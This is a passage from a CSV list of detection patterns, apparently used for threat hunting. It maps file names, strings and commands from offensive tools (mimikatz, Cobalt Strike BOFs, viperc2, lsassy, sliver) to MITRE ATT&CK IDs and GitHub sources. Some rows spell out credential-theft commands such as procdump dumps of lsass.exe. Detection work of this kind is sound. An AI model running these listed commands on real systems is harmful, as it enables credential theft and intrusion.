Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*Privileged Accounts Permissions - Irregular Accounts.csv*",".{0,1000}Privileged\sAccounts\sPermissions\s\-\sIrregular\sAccounts\.csv.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*PrivilegeEscalation*",".{0,1000}PrivilegeEscalation.{0,1000}","offensive_tool_keyword","PrivilegeEscalation","This program is a very short batch file which allows you to run anything with admin rights without prompting user could be related to other tools using privsec methods","T1548.001 - T1548.003 - T1548.008","TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/LouisVallat/PrivilegeEscalation","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PrivilegeEscalation_BypassUserAccountControl_Windows.py*",".{0,1000}PrivilegeEscalation_BypassUserAccountControl_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" 
"*PrivilegeEscalation_EnumPatchExample_Windows.py*",".{0,1000}PrivilegeEscalation_EnumPatchExample_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PrivilegeEscalation_ExploitationForPrivilegeEscalation_CVE_2021_40449.py*",".{0,1000}PrivilegeEscalation_ExploitationForPrivilegeEscalation_CVE_2021_40449\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PrivilegeEscalation_ExploitationForPrivilegeEscalation_EfsPotato.py*",".{0,1000}PrivilegeEscalation_ExploitationForPrivilegeEscalation_EfsPotato\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - 
T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PrivilegeEscalation_ExploitationForPrivilegeEscalation_SweetPotato.py*",".{0,1000}PrivilegeEscalation_ExploitationForPrivilegeEscalation_SweetPotato\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PrivilegeEscalation_ExploitationForPrivilegeEscalation_Windows.py*",".{0,1000}PrivilegeEscalation_ExploitationForPrivilegeEscalation_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PrivilegeEscalation_ProcessInjection_Getsystem.py*",".{0,1000}PrivilegeEscalation_ProcessInjection_Getsystem\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - 
T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Privileger.cpp*",".{0,1000}Privileger\.cpp.{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","131","28","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" "*Privileger.exe*",".{0,1000}Privileger\.exe.{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","131","28","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" "*Privileger-main.*",".{0,1000}Privileger\-main\..{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","131","28","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" "*Privilegerx64.exe*",".{0,1000}Privilegerx64\.exe.{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","131","28","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" "*Privilegerx86.exe*",".{0,1000}Privilegerx86\.exe.{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","131","28","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" 
"*PrivKit32*",".{0,1000}PrivKit32.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*PrivKit-main*",".{0,1000}PrivKit\-main.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*Probable-Wordlists*",".{0,1000}Probable\-Wordlists.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8454","1605","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" "*Probable-Wordlists*",".{0,1000}Probable\-Wordlists.{0,1000}","offensive_tool_keyword","Probable-Wordlists","real password lists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Exploitation tools","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8454","1605","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" "*procdump* lsass.exe *.dmp*",".{0,1000}procdump.{0,1000}\slsass\.exe\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","onex","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","N/A","N/A","3","269","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" "*procdump.exe -accepteula -ma 
lsass.exe*",".{0,1000}procdump\.exe\s\-accepteula\s\-ma\slsass\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*procdump.exe*lsass*",".{0,1000}procdump\.exe.{0,1000}lsass.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1003.001","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*procdump/dump_windows.go*",".{0,1000}procdump\/dump_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*procdump_dump*",".{0,1000}procdump_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*procdump_embedded*",".{0,1000}procdump_embedded.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - 
T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*procdump_path=*",".{0,1000}procdump_path\=.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*ProcDumpHandler.py -r *",".{0,1000}ProcDumpHandler\.py\s\-r\s.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*process must run as NT AUTHORITY\\SYSTEM to dump lsass memory*",".{0,1000}process\smust\srun\sas\sNT\sAUTHORITY\\\\SYSTEM\sto\sdump\slsass\smemory.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*process::exports*",".{0,1000}process\:\:exports.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*process::imports*",".{0,1000}process\:\:imports.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*process::list*",".{0,1000}process\:\:list.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*process::resume*",".{0,1000}process\:\:resume.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*process::run*",".{0,1000}process\:\:run.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*process::runp*",".{0,1000}process\:\:runp.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*process::start*",".{0,1000}process\:\:start.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*process::stop*",".{0,1000}process\:\:stop.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*process::suspend*",".{0,1000}process\:\:suspend.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*process_herpaderping*",".{0,1000}process_herpaderping.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*process_imports.cna*",".{0,1000}process_imports\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. 
optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","1","N/A","10","10","81","10","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z" "*process_imports.x64*",".{0,1000}process_imports\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. 
optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","1","N/A","10","10","81","10","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z" "*process_imports_api *.exe*",".{0,1000}process_imports_api\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. 
optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","0","N/A","10","10","81","10","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z" "*process_inject_allocator*",".{0,1000}process_inject_allocator.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*process_inject_bof_allocator*",".{0,1000}process_inject_bof_allocator.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*process_inject_bof_reuse_memory*",".{0,1000}process_inject_bof_reuse_memory.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 
